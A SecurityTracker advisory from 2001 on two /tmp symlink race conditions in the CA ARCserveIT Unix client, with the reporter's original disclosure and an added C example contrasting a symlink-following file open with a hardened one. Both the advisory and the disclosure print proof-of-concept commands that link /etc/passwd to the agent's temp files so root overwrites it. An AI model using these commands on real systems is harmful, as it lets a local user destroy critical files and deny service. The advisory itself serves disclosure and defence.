SecurityTracker.com

Category:   Application (Generic)  >   CA ARCserve Backup
Vendors:   CA
Computer Associates ARCserveIT Allows Local Users to Cause Any File on the Host to Be Overwritten
SecurityTracker Alert ID:  1001575
SecurityTracker URL:  http://securitytracker.com/id/1001575
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 18 2001
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): Client version 6.6x
Description:   A vulnerability has been reported in the Computer Associates ARCserveIT storage management client that allows local users to cause any file on the system to be overwritten.

It is reported that there are two /tmp directory race condition vulnerabilities.

The first /tmp race vulnerability can only be triggered if the asagent client has never been executed. A local unprivileged user can create a symbolic link from the asagent.tmp file to any privileged file on the system. When the asagent is started (by the root user), the linked file will be overwritten. If the linked file was a critical file, this could create a denial of service condition.

A transcript demonstrating this first vulnerability follows:

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd

In the second vulnerability, a similar situation exists but with the inetd.tmp file. Again, a local user can cause any file on the system to be overwritten when an authorized root user executes a certain command using asagent.

A transcript demonstrating this second vulnerability follows:

As user:

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent

The vendor has reportedly been informed.

Impact:   A local user can cause any file on the system to be overwritten. It appears that the user cannot specify the contents of the overwrite, so the end result is limited to a denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ca.com/arcserveit/
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
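
Both races come down to a privileged process writing to a fixed, predictable name in /tmp and following whatever is already there. The C program below is an added example, not CA's code and not part of the original advisory: it contrasts a symlink-following open with one that refuses any pre-existing name. How asagent actually opens its temp files is not shown on this page, so write_unsafe() is an assumed model of the behaviour in the transcripts; the function names, the /tmp/tmprace-XXXXXX directory and the stand-in victim file are constructed for the example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* Open path with the given flags, write data, close. Returns 0 or -1. */
static int write_with(const char *path, const char *data, int flags) {
    int fd = open(path, flags, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Weak pattern (assumed; the agent's code is not on the page): follows a
 * pre-planted symlink and truncates whatever it points to. */
int write_unsafe(const char *path, const char *data) {
    return write_with(path, data, O_WRONLY | O_CREAT | O_TRUNC);
}

/* Hardened: O_EXCL fails with EEXIST if the name exists at all, symlinks
 * included; O_NOFOLLOW is a second guard on the final path component. */
int write_safe(const char *path, const char *data) {
    return write_with(path, data, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW);
}

/* Constructed scenario in a private mkdtemp() directory: a stand-in victim
 * file and a symlink named asagent.tmp pointing at it. Returns victim size. */
long victim_size_after(int use_safe) {
    char dir[] = "/tmp/tmprace-XXXXXX", victim[64], lnk[64];
    struct stat st;
    long size = -1;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/asagent.tmp", dir);
    write_safe(victim, "root:x:0:0::/root:/bin/sh\n"); /* 26 bytes, constructed */
    if (symlink(victim, lnk) == 0) {
        if (use_safe) write_safe(lnk, ""); else write_unsafe(lnk, "");
        if (stat(victim, &st) == 0) size = (long)st.st_size;
    }
    unlink(lnk); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    return printf("unsafe=%ld safe=%ld\n", victim_size_after(0), victim_size_after(1)) < 0;
}
```

With the unsafe writer the victim ends up at 0 bytes, matching the zero-length /etc/passwd in the first transcript; with the hardened writer the open fails and the victim keeps its 26 bytes.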

Message History:   None.


 Source Message Contents

Subject:  tmp-races in ARCservIT Unix Client



Hi,

Computer Associates ARCservIT Client version 6.6x has at least two /tmp
races, as follows:

Vulnerability #1
-----------------

This tmp-race only works if the asagent client has never been executed
before.

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r--   1 0        sys            0 May  9 11:59 /etc/passwd


Vulnerability #2
-----------------

As user:

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent


Computer Associates has been informed.


Regards
Jonas Eriksson


 
 

